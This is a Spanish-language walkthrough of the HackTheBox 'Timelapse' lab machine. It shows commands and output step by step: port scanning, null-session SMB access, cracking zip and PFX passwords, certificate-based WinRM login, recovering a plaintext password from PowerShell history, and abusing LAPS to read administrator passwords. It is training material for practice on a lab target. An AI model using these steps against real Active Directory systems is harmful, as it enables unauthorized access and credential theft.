HackTheBox Timelapse

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.152 -oG port

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127

Puertos abiertos.

❯ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.152 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 01:06 EDT
Nmap scan report for 10.10.11.152
Host is up (0.037s latency).

PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-04-30 05:35:42Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-30T05:35:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 29m03s

Puertos abiertos con su version y servicio que corren.

❯ ldapsearch -x -H ldap://10.10.11.152 -s base | grep 'ServiceName'
ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,

Verificamos el dominio y los agregamos al etc/hosts.

SMB Enumeration

❯ smbclient -L 10.10.11.152 -N 2>/dev/null

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Shares          Disk

Como hemos comprobado, el servicio de SMB se encuntra expuesto, procederemos a comprobar cuales son los recursos que se encuentran compartidos en Samba.

❯ smbclient //10.10.11.152/Shares -N

Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

		6367231 blocks of size 4096. 1249624 blocks available
smb: \> cd Dev 
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

		6367231 blocks of size 4096. 1248813 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (16.1 KiloBytes/sec) (average 16.1 KiloBytes/sec)
smb: \Dev\> ^Z
zsh: suspended  smbclient //10.10.11.152/Shares -N
❯ ll
.rw-r--r-- root root 2.5 KB Wed Apr 30 01:17:10 2025  winrm_backup.zip

Nos conectamos con un NULL session y descargamos este backup.

❯ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
found file 'legacyy_dev_auth.pfx', (size cp/uc   2405/  2555, flags 9, chk 72aa)
checking pw udei9Qui                                

PASSWORD FOUND!!!!: pw == supremelegacy
❯ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

A través de la herramienta de fcrackzip procederemos a intentar crackear la contraseña de un .zip y descomprimir el contenido del archivo usando la contraseña encontrada.

PFX File (crackpkcs12)

❯ pfx2john legacyy_dev_auth.pfx >> hash

❯ john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:02 DONE (2025-04-30 01:29) 0.01600g/s 51724p/s 51724c/s 51724C/s thuglife06..thug211
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Creamos un hash para el archivo PFX y lo crackeamos usando John.

How To Extract Private Key and Certificate from a .PFX FileTecAdmin

❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
Enter Import Password:

❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
Enter Import Password:

Procederemos a convertir el .PFX en un .PEM y extraer la clave privada del certificado.

❯ evil-winrm -i 10.10.11.152 -c certificate.pem -k priv-key.pem -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
3a7d3f3b390ed3b18dfbcf5146576697

*Evil-WinRM* PS C:\Users\legacyy\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::4406:8e72:6739:2649
   Link-local IPv6 Address . . . . . : fe80::4406:8e72:6739:2649%13
   IPv4 Address. . . . . . . . . . . : 10.10.11.152
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:265%13
                                       10.10.10.2
*Evil-WinRM* PS C:\Users\legacyy\Desktop>

Una vez obtenido el certificado junto con su clave privada, utilizaremos la herramienta Evil-WinRM para establecer una conexión con el servicio WinRM. Para ello, indicaremos tanto el certificado como la clave privada previamente desencriptada.
Si la autenticación es exitosa, obtendremos acceso a la máquina TimeLapse. A continuación, verificaremos la presencia del archivo user.txt para confirmar el acceso como usuario.

*Evil-WinRM* PS C:\> type $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\>

Principalmente la contraseña pertenece al usuario "svc_deploy" pero intentaremos comprobar si la contraseña sirve para otros usuarios del AD.

*Evil-WinRM* PS C:\Users> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users>

LAPS (Local Administrator Password Solution) guarda las contraseñas locales de los administradores en el Active Directory, cifradas, y otorga permisos para leerlas a ciertos grupos.
Si svc_deploy está en LAPS_Readers, significa que podría tener permiso para:
Leer la contraseña del administrador local de otros equipos del dominio.

❯ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami 
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

Ahora somos el usuario svc_ que pertenece al grup LAPS_Readers.

Abusing LAPS to get passwords

Procederemos a enumerar las contraseñas de los usuarios Administradores de todos los equipos del AD para aprovecharnos de LAPS para extraer las credenciales. Comprobamos que hemos encontrado una contraseña.

Get-ADComputer -Filter * -Property ms-MCS-AdmPwd | Select-Object Name, ms-MCS-AdmPwd

Maquina Resuelta.

AnteriorHackTheBox Cicada SiguienteHackTheBox Return

Última actualización hace 3 meses

hashtagSMB Enumeration

SMB Enumeration